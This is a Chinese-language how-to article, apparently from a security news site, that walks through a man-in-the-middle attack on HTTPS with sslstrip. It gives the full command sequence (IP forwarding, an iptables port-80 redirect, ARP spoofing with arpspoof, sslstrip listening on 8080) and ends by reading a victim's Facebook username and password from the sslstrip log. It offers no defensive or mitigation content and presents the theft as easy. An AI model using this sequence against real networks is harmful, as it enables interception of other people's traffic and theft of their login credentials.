當前位置:
首頁 > 新聞 > 利用sslstrip對HTTPS連接發起中間人攻擊

利用sslstrip對HTTPS連接發起中間人攻擊

利用SSLStrip發起中間人攻擊可以透明地劫持網路中的http流量,查找HTTPS鏈接並重定向,然後將這些鏈接映射到類似的HTTP鏈接中或者同形的HTTPS鏈接。

它還支持提供類似鎖定圖標,選擇性日誌記錄和拒絕會話的模式。

step1

首先我們將設備設置為轉發模式,這樣我們的設備就可以轉發目標不是我們設備的數據包。

echo 1>/proc/sys/net/ipv4/ip_forward

step2

還需要設置iptables,將流量從80埠重定向到8080埠,確保出站連接發送到sslstrip中。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

step3

需要找到我們的網關

route -n

前三步如圖所示

step4

接下來我們需要找到目標主機的IP地址

step5

攻擊者利用ARP欺騙技術將虛假的ARP消息發送到區域網中。

arpspoof -i -t

step6

現在我們打開一個新的終端並監聽8080埠,命令如下

sslstrip -l 8080

step7

現在我們轉到受害主機中,並且在瀏覽器中輸入facebook.com,我們知道Facebook本來是使用的HTTPS協議,但是這裡我們看到與Facebook是通過http建立的連接。

step8

現在,返回到家目錄,查看sslstrip.log日誌文件,我們可以看到受害者登錄時輸入的用戶名和密碼,如圖:

就是這麼easy,我們就拿到了受害者的憑證。

更多kali Linux教程,請參考:

·Lynis—開源安全審計工具詳解

·sqlmap-檢測和利用SQL注入詳解

·HPING3—網路掃描器-包生成器


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

看看網路犯罪分子是如何攻擊使用免費Wi-Fi用戶
如何尋找隱藏在CloudFlare或TOR背後的真實原始IP

TAG:嘶吼RoarTalk |